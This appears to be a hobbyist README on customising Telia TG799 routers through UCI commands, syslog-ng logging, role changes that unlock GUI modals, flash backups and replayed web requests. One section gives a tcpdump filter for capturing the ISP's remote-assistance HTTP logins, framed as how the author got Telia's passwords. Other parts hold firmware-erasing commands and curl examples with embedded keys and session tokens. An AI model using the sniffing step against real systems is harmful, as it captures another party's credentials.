    option log_port '514'
    option hostname 'router'
    option zonename 'Europe/Stockholm'
    option timezone 'CET-1CEST,M3.5.0,M10.5.0/3'
    option network_timezone '1'
    option hw_reboot_count '0'
    option sw_reboot_count '0'
    option cronloglevel '5'

# Filters for /modals/logviewer-modal.lp and what to send to syslog-ng server

    list log_filter 'Everything'
    list log_filter 'warmboot'
    list log_filter 'cwmp'
    list log_filter 'cwmpd'
    list log_filter 'crond'
    list log_filter 'Critical'
    list log_filter 'Zonewatcher'
    list log_filter 'wifiinfo'
    list log_filter 'wifi'
    list log_filter 'mmpbxd'
    list log_filter 'transformer'
    list log_filter 'zoneredird'
    list log_filter 'zone_daemon'
    list log_filter 'syslog'
    list log_filter 'root'
    list log_filter 'premiumd'
    list log_filter 'lua'
    list log_filter 'nginx'
    list log_filter 'kernel'
    list log_filter 'ipks'
    list log_filter 'ipk'
    list log_filter 'user'
    list log_filter 'mwan'
    list log_filter 'lan'
    list log_filter 'vlan'
    list log_filter 'opkg'
    list log_filter 'hostmanager'
    list log_filter 'hostapd'
    list log_filter 'fseventd'
    list log_filter 'dnsmasq-dhcp'
    list log_filter 'dnsmasq'
    list log_filter 'ddns-scripts'
    list log_filter 'awk'
    list log_filter 'assist.remote'
    list log_filter 'assist'
    list log_filter 'ash'
    list log_filter 'bash'
    list log_filter 'sh'
    list log_filter 'clash'
    list log_filter 'user.notice'
    list log_filter 'auth'
    list log_filter 'pppoe-relay-hotplug'
    list log_filter 'odhcpd'
    list log_filter 'ipsec_starter'
    list log_filter 'ipsec'
    list log_filter 'insmod'
    list log_filter 'modprobe'
    list log_filter 'rmmod'
    list log_filter 'vpn'
    list log_filter 'openvpn'
    list log_filter 'netifd'
    list log_filter 'wansensing'
    list log_filter 'miniupnpd'
    list log_filter 'user.info'
    list log_filter 'guest'
    list log_filter 'wget'
    list log_filter 'curl'
    list log_filter 'ssh'
    list log_filter 'sshd'
    list log_filter 'telnet'
    list log_filter 'http'
    list log_filter 'https'
    list log_filter 'ftp'
    list log_filter 'ftpd'
    list log_filter 'uci'
    list log_filter 'postmortem'
    list log_filter 'trafficmon.voip'

config timeserver 'ntp'
    option enable_server '1'
    option program '/sbin/firstusedate'
    list server 'ntp1.rgw.telia.se'
    list server 'ntp2.rgw.telia.se'
    list server '0.se.pool.ntp.org'
    list server '1.se.pool.ntp.org'
    list server '2.se.pool.ntp.org'
    list server '3.se.pool.ntp.org'
    list server 'time.google.com'
    list server 'time1.google.com'
    list server 'time2.google.com'
    list server 'time3.google.com'
    list server 'time4.google.com'

config config config
     option export_plaintext  '1'
     option export_unsigned   '1'
     option import_plaintext  '1'
     option import_unsigned   '1'
     option usb_filesystem_charset 'utf8'

config coredump
    option path '/root'
    option url 'https://telia-core.tgwfd.org:5443/'
    option action 'ignore'
    option reboot '0'

config log 'logread'
    option path 'logread'

config trafficmon
    option interface 'wan'
    option minute '*/720'

config trafficmon
    option interface 'mgmt'
    option minute '*/720'

config trafficmon
    option interface 'voip'
    option minute '*/720'

config trafficmon
    option interface 'iptv'
    option minute '*/720'

config time 'time'
EOF

Now restart the system service:

/etc/init.d/system restart

On your syslog server, put the following in /etc/syslog-ng/syslog-ng.conf (it is syslog-ng syntax, as the @version line shows) to receive all messages from your TG799 Xtreme router.

Here is a screenshot from the listening server with the config below:

Screenshot

@version: 3.30
@include "scl.conf"

options {
    create_dirs(yes);
    owner(wuseman);
    group(wuseman);
    perm(0644);
    dir_owner(wuseman);
    dir_group(wuseman);
    dir_perm(0755);
};
 
 
source s_udp {
    network (
            ip-protocol(6)
            transport("udp")
            port(514)
    );
    network (
            transport("udp")
            port(514)
    );
};

destination d_host-specific {
    file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog.log");
};

log {
    source(s_udp);
    destination(d_host-specific);
};


source src {
unix-stream("/dev/log" max-connections(256));
internal();
};

source kernsrc { file("/proc/kmsg"); };

# define destinations
destination authlog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-auth.log"); };
destination syslog { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-syslog"); };
destination cron { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-cron.log"); };
destination daemon { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-daemon.log"); };
destination kern { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-kern.log"); };
destination lpr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-lpr.log"); };
destination user { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-user.log"); };
destination mail { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.log"); };
destination mailinfo { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.info"); };
destination mailwarn { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.warn"); };
destination mailerr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-mail.err"); };
destination newscrit { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.crit"); };
destination newserr { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.err"); };
destination newsnotice { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-news/news.notice"); };
destination debug { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-debug"); };
destination messages { file("/home/wuseman/logs/$HOST/$YEAR-$MONTH-$DAY/${HOST}-messages"); };
destination console { usertty("root"); };
destination console_all { file("/dev/tty12"); };
#destination console_all { file("/dev/console"); };
filter f_authpriv { facility(auth, authpriv); };
filter f_syslog { not facility(authpriv, mail); };
filter f_cron { facility(cron); };
filter f_daemon { facility(daemon); };
filter f_kern { facility(kern); };
filter f_lpr { facility(lpr); };
filter f_mail { facility(mail); };
filter f_user { facility(user); };
filter f_debug { not facility(auth, authpriv, news, mail); };
filter f_messages { level(info..warn)
    and not facility(auth, authpriv, mail, news); };
filter f_emergency { level(emerg); };
filter f_info { level(info); };
filter f_notice { level(notice); };
filter f_warn { level(warn); };
filter f_crit { level(crit); };
filter f_err { level(err); };
filter f_failed { message("failed"); };
filter f_denied { message("denied"); };

# connect filter and destination
log { source(src); filter(f_authpriv); destination(authlog); };
log { source(src); filter(f_syslog); destination(syslog); };
log { source(src); filter(f_cron); destination(cron); };
log { source(src); filter(f_daemon); destination(daemon); };
log { source(kernsrc); filter(f_kern); destination(kern); };
log { source(src); filter(f_lpr); destination(lpr); };
log { source(src); filter(f_mail); destination(mail); };
log { source(src); filter(f_user); destination(user); };
log { source(src); filter(f_mail); filter(f_info); destination(mailinfo); };
log { source(src); filter(f_mail); filter(f_warn); destination(mailwarn); };
log { source(src); filter(f_mail); filter(f_err); destination(mailerr); };
log { source(src); filter(f_debug); destination(debug); };
log { source(src); filter(f_messages); destination(messages); };
log { source(src); filter(f_emergency); destination(console); };

# default log
log { source(src); destination(console_all); };

Now restart the system service on your router and the messages should start arriving in the destinations above:

/etc/init.d/system restart

Enable or disable Time of Day ACL rules (0 = off, 1 = on):

uci set tod.global.enabled='0'

For login with debug mode enabled, try the URL below (probably not possible, but worth a try):

http://192.168.1.1/?debug=1

Enable or disable the automatic reboot after a segmentation fault in a user-space program (0 = keep running, 1 = reboot):

uci set system.@coredump[0].reboot='0'
uci commit system

Print the access key, i.e. the first 8 characters of the /proc/rip/0124 file:

sed -e 's/^\(.\{8\}\).*/\1/' /proc/rip/0124

Check which DNS resolvers are currently in use:

cat /etc/resolv.conf

Enable or disable content sharing (Samba / DLNA):

uci set samba.samba.enabled='1'
uci set dlnad.config.enabled='1'

Re-enable Time of Day ACL rules (1 = on; the disable command is above):

uci set tod.global.enabled='1'

To disable the mobile (LTE) card, since there is no button for it in the GUI, execute:

uci set mobiled.device_defaults.enabled=0
uci commit

List installed packages:

opkg list_installed 

Add a new modal (in this order: rule, ruleset entry, target, roles; <name> and <role> are placeholders):

uci set web.<name>modal=rule
uci add_list web.ruleset_main.rules=<name>modal
uci set web.<name>modal.target='/modals/<name>-modal.lp'
uci add_list web.<name>modal.roles='<role>'
uci commit; /etc/init.d/nginx restart

A minimal alias definition for a bridged interface might be:

config interface lan
    option 'ifname' 'eth0'
    option 'type' 'bridge'
    option 'proto' 'static'
    option 'ipaddr' '192.168.1.1'
    option 'netmask' '255.255.255.0'

config interface lan2
    option 'ifname' 'br-lan'
    option 'proto' 'static'
    option 'ipaddr' '10.0.0.1'
    option 'netmask' '255.255.255.0'

For a non-bridged interface:

config interface lan
    option 'ifname' 'eth0'
    option 'proto' 'static'
    option 'ipaddr' '192.168.1.1'
    option 'netmask' '255.255.255.0'

config interface lan2
    option 'ifname' 'eth0'
    option 'proto' 'static'
    option 'ipaddr' '10.0.0.1'
    option 'netmask' '255.255.255.0'

Use your TG799 as a switch instead of a router:

Here is my example for using all ports for the local network and also the WAN port (5). The heredoc has to be closed with EOF, and the comments go on their own lines, since UCI does not accept a comment after an option value:

cat << "EOF" > /etc/config/network
config 'switch' 'eth0'
    option 'enable' '1'

# wan
config 'switch_vlan' 'eth0_0'
    option 'device' 'eth0'
    option 'vlan' '0'
    option 'ports' '4 5'

# lan 1
config 'switch_vlan' 'eth0_1'
    option 'device' 'eth0'
    option 'vlan' '1'
    option 'ports' '3 5'

# lan 2
config 'switch_vlan' 'eth0_2'
    option 'device' 'eth0'
    option 'vlan' '2'
    option 'ports' '2 5'

# lan 3
config 'switch_vlan' 'eth0_3'
    option 'device' 'eth0'
    option 'vlan' '3'
    option 'ports' '1 5'

# lan 4
config 'switch_vlan' 'eth0_4'
    option 'device' 'eth0'
    option 'vlan' '4'
    option 'ports' '0 5'
EOF

Create backup of all /dev/mtd[0-7]

Insert your usb that has ext2/ext3 or ext4 format:

# take the mount point (field 2 of /proc/mounts) of the first mounted USB partition
usb_mount="$(grep '^/dev/sd[a-z][0-9]' /proc/mounts | cut -d' ' -f2 | head -n1)"
if [ -z "$usb_mount" ]; then
    echo "no usb drive mounted"; exit 1
fi
mkdir -p "$usb_mount/backup_mtd"
for number in $(seq 0 7); do
    dd if=/dev/mtd$number of="$usb_mount/backup_mtd/mtd$number.img"
done
sync

Result (file output) for 17.2.0405-1441042-20191114170637-ec29699cbbf5c66c53b310489f62a141f46bf628:

 mtd1.img: Squashfs filesystem, little endian, version 4.0, xz compressed, 29719215 bytes, 3791 inodes, blocksize: 262144 bytes, created: Tue May  2 15:59:58 2017
 mtd2.img: ISO-8859 text, with very long lines (65536), with no line terminators
 mtd3.img: data
 mtd4.img: data
 mtd5.img: data
 mtd6.img: data

Just mount mtd1 (the squashfs root filesystem) and play around:

squashfuse mtd1.img /mnt/router/justforfun

Using bridge mode with a dedicated PPPoE ethernet port (the LAN interface gets its own DNS server and upstream gateway, and the SIP stack is bound to it so voice keeps working behind the bridge):

uci set network.lan.dns='1.1.1.1'
uci set network.lan.gateway='192.168.0.254'
uci set mmpbxrvsipnet.sip_net.interface='lan'
uci set mmpbxrvsipnet.sip_net.interface6='lan6'

Add the items below in the same order as posted to avoid errors.

List all roles admin is not yet a member of (the second line turns that list into ready-to-paste uci commands):

uci show|grep \.roles|grep -v admin
uci show|grep \.roles|grep -v admin|cut -d'=' -f1|sed 's/^/uci add_list /g'|sed 's/$/=admin/g' # copy and paste

So now we add admin to those roles, so admin can reach the same cards as superuser and telia.

Order to add: Rule > Ruleset > Modal > Target

Rules

uci set web.natalghelpermodal=rule
uci set web.relaymodal=rule
uci set web.systemmodal=rule
uci set web.iproutesmodal=rule
uci set web.mmpbxinoutgoingmapmodal=rule
uci set web.ltedoctor=rule
uci set web.ltemodal=rule
uci set web.lteprofiles=rule
uci set web.ltesim=rule
uci set web.ltesms=rule
uci set web.logconnections=rule
uci set web.logviewer=rule
uci add_list web.logviewer.roles='admin'
uci set tod.global.enabled='1'
uci set mobiled.globals.enabled='1'
uci set mobiled.device_defaults.enabled='1'
uci commit; /etc/init.d/nginx restart

Ruleset

uci add_list web.ruleset_main.rules=xdsllowmodal
uci add_list web.ruleset_main.rules=systemmodal
uci add_list web.ruleset_main.rules=diagnostics
uci add_list web.ruleset_main.rules=basicviewaccesscodemodal
uci add_list web.ruleset_main.rules=basicviewwifiguestmodal
uci add_list web.ruleset_main.rules=basicviewwifiguest5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifipskmodal
uci add_list web.ruleset_main.rules=basicviewwifipsk5GHzmodal
uci add_list web.ruleset_main.rules=basicviewwifissidmodal
uci add_list web.ruleset_main.rules=basicviewwifissid5GHzmodal
uci add_list web.ruleset_main.rules=relaymodal
uci add_list web.ruleset_main.rules=iproutesmodal
uci add_list web.ruleset_main.rules=mmpbxstatisticsmodal
uci commit; /etc/init.d/nginx restart

Targets

uci set web.mmpbxinoutgoingmapmodal.target='/modals/mmpbx-inoutgoingmap-modal.lp'
uci set web.iproutesmodal.target='/modals/iproutes-modal.lp'
uci set web.systemmodal.target='/modals/system-modal.lp'
uci set web.relaymodal.target='/modals/relay-modal.lp'
uci set web.natalghelpermodal.target='/modals/nat-alg-helper-modal.lp'
uci set web.diagnosticstcpdumpmodal.target='/modals/diagnostics-tcpdump-modal.lp'
uci set web.basicviewaccesscodemodal.target='/modals/basicview-accesscode-modal.lp'
uci set web.basicviewwifiguestmodal.target='/modals/basicview-wifiguest-modal.lp'
uci set web.basicviewwifiguest5GHzmodal.target='/modals/basicview-wifiguest5GHz-modal.lp'
uci set web.basicviewwifipskmodal.target='/modals/basicview-wifipsk-modal.lp'
uci set web.basicviewwifipsk5GHzmodal.target='/modals/basicview-wifipsk5GHz-modal.lp'
uci set web.basicviewwifissidmodal.target='/modals/basicview-wifissid-modal.lp'
uci set web.basicviewwifissid5GHzmodal.target='/modals/basicview-wifissid5GHz-modal.lp'
uci set web.ltemodal.target='/modals/lte-modal.lp'
uci set web.ltedoctor.target='/modals/lte-doctor.lp'
uci set web.lteprofiles.target='/modals/lte-profiles.lp'
uci set web.logconnections.target='/modals/log-connections-modal.lp'
uci set web.logviewer.target='/modals/logviewer-modal.lp'
uci set web.ltesms.target='/modals/lte-sms.lp'
uci set web.ltesim.target='/modals/lte-sim.lp'
uci set web.xdsllowmodal.target='/modals/xdsl-low-modal.lp'
uci commit; /etc/init.d/nginx restart

Roles

Show all rules where we want to add ourselves (admin):

uci show|grep -i roles|grep -v admin
uci add_list web.uidefault.upgradefw_role=admin
uci add_list web.assistancemodal.roles='admin'
uci add_list web.usermgrmodal.roles='admin'
uci add_list web.todmodal.roles='admin'
uci add_list web.iproutesmodal.roles='admin'
uci add_list web.cwmpconf.roles='admin'
uci add_list web.relaymodal.roles='admin'
uci add_list web.systemmodal.roles='admin'
uci add_list web.natalghelpermodal.roles='admin'
uci add_list web.xdsllowmodal.roles='admin'
uci add_list web.mmpbxprofilemodal.roles='admin'
uci add_list web.ltesms.roles='admin'
uci commit
/etc/init.d/nginx restart

If the web GUI ever gets broken because you messed it up, reset the router with 'rtfd --all' (same as pressing the reset button).

If you want to keep files and just reset settings, use 'rtfd --soft' instead.

No space left and no commands work at all? Not even rtfd?

Run the command below for a full factory reset:

**OBS OBS!! This bricked one of mine because I wasn't careful enough:**

For all Telia models but NOT VDNT-O!!

mtd -r erase rootfs_data

Just for VDNT-O:

mtd -r erase userfs

Remove telia from all roles (uci del_list takes one entry per call, hence xargs -n1; commit afterwards or the change stays in the staging area):

uci show|egrep -i "roles.*telia"|cut -d'=' -f1|sed 's/$/=telia/g'|xargs -n1 uci del_list
uci commit web
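The two role one-liners on this page (listing the roles admin is missing from, and stripping telia from every role) are easy to get subtly wrong, so here is an added example, not code from the README or the firmware, that performs the same selection in Python over `uci show` output and emits one del_list command per entry. UCI_SHOW_SAMPLE is constructed from section names used on this page; it is not a dump from a real device.

```python
# Added example (not the README's own code): builds the `uci add_list` / `uci del_list`
# commands that the grep/sed one-liners emit, from `uci show` output, so the
# selection logic is explicit and del_list gets exactly one entry per call.
# UCI_SHOW_SAMPLE is constructed for this example from section names used on this
# page; it is not a dump from a real device.
import re
from typing import Dict, List

UCI_SHOW_SAMPLE = """\
web.assistancemodal=rule
web.assistancemodal.target='/modals/assistance-modal.lp'
web.assistancemodal.roles='superuser' 'telia'
web.systemmodal=rule
web.systemmodal.target='/modals/system-modal.lp'
web.systemmodal.roles='superuser' 'telia'
web.wirelessmodal=rule
web.wirelessmodal.roles='admin' 'superuser' 'telia'
web.uidefault.upgradefw_role='superuser' 'telia'
"""

_QUOTED = re.compile(r"'([^']*)'")


def parse_uci_show(text: str) -> Dict[str, List[str]]:
    """Map each 'config.section.option' path to its value(s).

    `uci show` prints lists as space-separated quoted items; older builds print
    them unquoted, so both forms are accepted. Section type lines
    (web.foo=rule) are kept as well, as a single-element list.
    """
    options: Dict[str, List[str]] = {}
    for line in text.splitlines():
        if "=" not in line:
            continue
        path, raw = line.split("=", 1)
        values = _QUOTED.findall(raw) if "'" in raw else raw.split()
        options[path.strip()] = values
    return options


def is_role_option(path: str) -> bool:
    """What the page's two greps select: '.roles' lists and the upgradefw_role option."""
    last = path.rsplit(".", 1)[-1]
    return last == "roles" or last.endswith("_role")


def add_list_commands(options: Dict[str, List[str]], role: str) -> List[str]:
    """uci add_list for every role option that does not yet contain `role`."""
    return [f"uci add_list {path}={role}"
            for path, values in options.items()
            if is_role_option(path) and role not in values]


def del_list_commands(options: Dict[str, List[str]], role: str) -> List[str]:
    """uci del_list, one path per command, for every role option containing `role`."""
    return [f"uci del_list {path}={role}"
            for path, values in options.items()
            if is_role_option(path) and role in values]


if __name__ == "__main__":
    opts = parse_uci_show(UCI_SHOW_SAMPLE)
    for cmd in add_list_commands(opts, "admin") + del_list_commands(opts, "telia"):
        print(cmd)
    print("uci commit web; /etc/init.d/nginx restart")
```

On a device you would feed it the real output (`uci show web`) instead of the sample and pipe the printed commands into a shell; the trailing commit and nginx restart are what make the role change take effect in the GUI.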

Once you have added the above you can browse to system-modal.lp and enable/disable SSH or put the router in BOOTP mode:

... or enable/disable assistance yourself and just hand the credentials to Telia when they need them. Feels better? :)

Change port (web.remote.port is the assistance port; mwan.remoteassist.dest_ip holds the remote-assistance address, and cut strips any prefix length from it):

assistance_ip="$(uci get mwan.remoteassist.dest_ip | cut -d'/' -f1)"
assistance_port="$(uci get web.remote.port)"
uci set web.remote.port='<port>'
uci commit web

Are you a sneaky bastard like myself? Cool! This is not far from how I got their passwords at the top of this README. Figure out that part yourself.

tcpdump -i vlan_mgmt -s 0 -A 'host <vlan_mgmt_ip> and (tcp dst port <assistance_port> or tcp dst port 80) and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420 or tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504F5354)'

The whole filter sits inside one pair of quotes, and the port tests and the method tests are parenthesised separately: BPF's "and" binds tighter than "or", so without the parentheses the filter would also capture every packet to the assistance port and every POST to any port.

What does this mean?

tcp[12:1] is the byte holding the TCP data offset (the header length in 32-bit words, in the upper nibble). Masking it with 0xf0 and shifting right by 2 turns that into the header length in bytes, so tcp[<that>:4] reads the first four payload bytes no matter how many TCP options the segment carries. 0x47455420 is the ASCII for 'G' 'E' 'T' ' ' and 0x504F5354 for 'P' 'O' 'S' 'T':

    ┌───────────┬─────────────┐
    │ Character │ ASCII Value │
    ├───────────┼─────────────┤
    │ G         │ 47          │
    ├───────────┼─────────────┤
    │ E         │ 45          │
    ├───────────┼─────────────┤
    │ T         │ 54          │
    ├───────────┼─────────────┤
    │ Space     │ 20          │
    └───────────┴─────────────┘

So...

It means that you will grab all POST and GET HTTP requests from Telia's client :) This only works for cleartext HTTP: on a TLS port the method bytes are encrypted, so the comparison never matches.
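As an added example, not part of the original README, the following Python reimplements the BPF comparison above on raw TCP segments and contrasts it with a fixed tcp[20:4] offset, which breaks as soon as a segment carries TCP options. The segments are constructed here for the example, not captured traffic.

```python
# Added example, not from the README: reimplements in Python the test that the
# tcpdump/BPF expressions perform on each TCP segment,
#   tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420   -> payload starts with "GET "
#   tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504F5354   -> payload starts with "POST"
# and contrasts it with a fixed tcp[20:4] offset. The segments below are
# constructed for this example; nothing here is captured traffic.
import struct
from typing import Optional

GET_WORD = 0x47455420   # b"GET "
POST_WORD = 0x504F5354  # b"POST"


def tcp_payload_offset(segment: bytes) -> int:
    """Header length in bytes: upper nibble of byte 12 (data offset in words) * 4.

    BPF spells it (tcp[12:1] & 0xf0) >> 2, i.e. (nibble << 4) >> 2 == nibble * 4.
    """
    if len(segment) < 20:
        raise ValueError("segment shorter than a minimal TCP header")
    return (segment[12] & 0xF0) >> 2


def first_payload_word(segment: bytes) -> Optional[int]:
    """The 4 bytes at the payload offset as a big-endian int, like tcp[off:4]."""
    off = tcp_payload_offset(segment)
    if off < 20 or len(segment) < off + 4:
        return None  # BPF simply fails the comparison here
    return struct.unpack("!I", segment[off:off + 4])[0]


def matches_http_request(segment: bytes) -> bool:
    """What the filter matches: the first payload word is 'GET ' or 'POST'."""
    return first_payload_word(segment) in (GET_WORD, POST_WORD)


def naive_match(segment: bytes) -> bool:
    """The tempting shortcut tcp[20:4]: assumes a 20-byte header, i.e. no options."""
    if len(segment) < 24:
        return False
    return struct.unpack("!I", segment[20:24])[0] in (GET_WORD, POST_WORD)


def build_segment(dst_port: int, payload: bytes, options: bytes = b"") -> bytes:
    """Construct a TCP segment (no IP header) with PSH|ACK and optional TCP options."""
    if len(options) % 4:
        raise ValueError("TCP options must be padded to a 32-bit boundary")
    data_offset = 5 + len(options) // 4
    offset_and_flags = (data_offset << 12) | 0x18  # PSH|ACK
    header = struct.pack("!HHIIHHHH", 40000, dst_port, 1, 1, offset_and_flags, 65535, 0, 0)
    return header + options + payload


# Constructed sample segments (not captured traffic).
PLAIN_GET = build_segment(80, b"GET /gateway.lp HTTP/1.1\r\nHost: 192.168.1.1\r\n\r\n")
# NOP, NOP, timestamp option (kind 8, length 10) = 12 bytes of options -> 32-byte header
TIMESTAMP_OPTS = b"\x01\x01\x08\x0a" + b"\x00" * 8
POST_WITH_OPTS = build_segment(60443, b"POST /login.lp HTTP/1.1\r\n", TIMESTAMP_OPTS)
TLS_RECORD = build_segment(60443, b"\x16\x03\x01\x00\x05hello")  # TLS, not a method

if __name__ == "__main__":
    for name, seg in [("PLAIN_GET", PLAIN_GET), ("POST_WITH_OPTS", POST_WITH_OPTS),
                      ("TLS_RECORD", TLS_RECORD)]:
        print(f"{name}: offset={tcp_payload_offset(seg)} "
              f"bpf={matches_http_request(seg)} naive={naive_match(seg)}")
```

The POST sample carries a timestamp option, so its payload starts at byte 32; the BPF-style offset finds it while the fixed tcp[20:4] reads option bytes and misses the request, which is exactly why the filter computes the offset from byte 12 instead of hard-coding 20.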

Failsafe boot for VDNT-O

Repeat this cycle four times:

00-00 - Press start
00-45 - Let it boot until 45s
46-60 - Press Reset button
Wait until it reboots

After the fourth reset, let it boot as normal.

Failsafe boot for VBNT-H

Same cycle with a shorter window, repeated four times:

00-00 - Press start
00-25 - Let it boot until 25s
25-45 - Press Reset button
Wait until it reboots

After the fourth reset, let it boot as normal.

Go to http://192.168.1.1 and use the exploit; once you are in the shell, make bank_1 the active bank:

echo "bank_1" > /proc/banktable/active

Now you can reboot and lean back :)

Curl via CLI

The sessionID cookie and the CSRFtoken in the requests below are tied to a logged-in session; take both from your own browser session before replaying any of them.

Wifi

curl 'http://192.168.1.1/modals/wireless-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
  --data-raw 'admin_state=1&standard=bgn&requested_channel=auto&channelwidth20=20MHz&channelwidth40=20MHz&channelwidth80=20MHz&sgi=1&cdd=1&stbc=1&ap_enabled=1&ssid=Telia-1DAA3B&ap_broadcast_ssid=1&security=wpa2-psk&wpa_psk=D4104BC782&wep_key=899BC4B768&radius_authent_ip=&radius_authent_port=1812&radius_authent_secret=899BC4B768&radius_account_ip=&radius_account_port=1813&radius_account_secret=&wps_enabled=0&wps_device_pin_code=&radius_authent_state=&radius_account_state=&acl_mode=unlock&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
  --compressed

Enable IPV6

curl 'http://192.168.1.1/modals/ethernet-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Accept: text/html, */*; q=0.01' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=4ed096466def33a5f7faa0a00d116d7b4f72b27c78b8377839b0885651669e0c' \
  --data-raw 'localdevIP=192.168.1.1&localdevmask=255.255.255.0&localIPv6=1&dhcpv4State=server&dhcpStart=64&dhcpLimit=180&leaseTime=1h&dnsServer=192.168.1.1&action=SAVE&fromModal=YES&CSRFtoken=847ed2f109f0cd1594d4aa392f4ecf3e3555129620aac7f53511787bc9d41aae' \
  --compressed

Import config via curl (the browser's copy-as-cURL output drops the file body, so supply it with -F; the file field name and the CSRFtoken come from your own browser's form submission, and curl computes Content-Length and the multipart boundary itself):

curl 'http://192.168.1.1/modals/gateway-modal.lp?action=import_config' \
  -X 'POST' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
  -F 'CSRFtoken=<token>' \
  -F '<file-field-name>=@<exported-config-file>' \
  --compressed \
  --insecure

Export config via curl

curl 'http://192.168.1.1/modals/gateway-modal.lp' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=6f39690ffb1f157ad0564201ae484f75a3f3041c2fd5b7d073b174538c9f36c2' \
  --data-raw 'action=export_config&CSRFtoken=86b6d3a28f3cb5b743662f8032d97731fed9a42028b42ab71aa15718c09b2236' \
  --compressed \
  --insecure

Upgrade Firmware

Query the bank size, upload the RBI, then poll the upgrade status. As with the config import, the upload request as copied from the browser is missing the file body; it is supplied with -F below, with the field name and CSRFtoken taken from your own browser's form submission:

curl 'http://192.168.1.1/modals/gateway-modal.lp?action=getbanksize' \
  -H 'Connection: keep-alive' \
  -H 'Accept: application/json, text/javascript, */*; q=0.01' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'X-Requested-With: XMLHttpRequest' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
  -H 'Cookie: sessionID=0cba5e09a4e286ec6d9411538cf156f26a7530925c7107c78c1d5413b0727e7f' \
  --compressed \
  --insecure
curl 'http://192.168.1.1/modals/gateway-modal.lp?action=upgradefw' \
  -X 'POST' \
  -H 'Connection: keep-alive' \
  -H 'Cache-Control: max-age=0' \
  -H 'Upgrade-Insecure-Requests: 1' \
  -H 'Origin: http://192.168.1.1' \
  -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' \
  -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
  -H 'Referer: http://192.168.1.1/gateway.lp' \
  -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' \
